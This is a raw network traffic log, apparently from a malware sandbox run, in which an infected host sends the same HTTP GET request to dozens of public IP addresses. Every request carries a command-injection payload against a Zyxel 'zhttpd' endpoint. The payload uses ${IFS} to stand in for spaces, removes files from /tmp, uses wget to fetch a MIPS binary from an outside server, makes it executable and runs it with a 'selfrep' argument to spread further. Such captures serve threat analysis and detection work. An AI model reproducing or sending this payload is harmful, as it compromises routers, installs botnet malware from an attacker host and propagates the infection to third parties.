                                                Jan 28, 2024 10:16:36.991722107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7445192.168.2.2345664103.216.134.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991769075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7446192.168.2.2350892112.199.56.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991795063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7447192.168.2.2342424163.52.74.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991816998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7448192.168.2.2356622201.129.94.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991827011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7449192.168.2.2340664151.124.251.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991882086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7450192.168.2.235637266.156.124.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991899967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7451192.168.2.235466447.147.97.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991931915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7452192.168.2.2344862143.126.102.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991960049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7453192.168.2.2353478113.24.235.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991975069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7454192.168.2.233961835.173.12.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991991997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7455192.168.2.2345894110.254.145.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992026091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7456192.168.2.2349686181.138.91.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992053032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7457192.168.2.2334572151.224.42.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992072105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7458192.168.2.234670088.118.16.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992109060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7459192.168.2.236069846.73.247.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992122889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7460192.168.2.235150665.17.41.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992171049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7461192.168.2.2359032102.161.104.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992192030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7462192.168.2.2340394185.36.16.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992208004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7463192.168.2.2357112156.243.180.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992240906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7464192.168.2.23461822.186.119.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992261887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7465192.168.2.2360432182.89.226.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992283106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7466192.168.2.234968483.150.150.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992338896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7467192.168.2.233873092.213.106.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992345095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7468192.168.2.2339750219.1.66.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992366076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7469192.168.2.2352832191.104.85.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992405891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7470192.168.2.234598297.33.78.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992438078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7471192.168.2.2354948207.26.193.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992455959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7472192.168.2.2347584141.59.199.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992486000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7473192.168.2.235592691.78.52.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992518902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7474192.168.2.2335066166.157.49.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992537022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7475192.168.2.2338852121.124.166.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992588043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7476192.168.2.2337990150.215.217.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992615938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7477192.168.2.233893231.129.19.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992641926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7478192.168.2.234862420.251.20.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992697001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7479192.168.2.234951885.94.37.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992710114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7480192.168.2.234364693.225.165.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992741108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7481192.168.2.23432401.69.102.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992742062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7482192.168.2.233759282.22.13.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992757082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7483192.168.2.233730453.211.75.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992779016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7484192.168.2.233612814.123.22.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992820024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7485192.168.2.234295034.245.33.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992865086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7486192.168.2.2353818194.245.72.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992865086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7487192.168.2.2350206159.114.65.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992906094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7488192.168.2.2355322161.24.113.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992949009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7489192.168.2.234756040.84.129.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992959023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7490192.168.2.2334306112.133.22.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.992993116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7491192.168.2.2353322190.221.22.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993027925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7492192.168.2.234544218.113.225.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993052959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7493192.168.2.235240023.204.85.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993076086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7494192.168.2.2338008117.227.140.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993113041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7495192.168.2.2360038115.163.155.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993161917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7496192.168.2.2348344163.158.47.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993174076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7497192.168.2.2354806210.192.216.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993221998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7498192.168.2.2352220126.59.131.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993223906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7499192.168.2.2336340142.196.74.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993274927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7500192.168.2.2347270144.134.175.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993290901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7501192.168.2.2337512186.88.128.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993343115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7502192.168.2.2356530187.139.35.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993355989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7503192.168.2.2340952160.17.227.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993377924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7504192.168.2.234197020.218.111.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993434906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7505192.168.2.2338340183.230.255.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.993436098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7506192.168.2.234231496.119.142.250443
                                                TimestampBytes transferredDirectionData
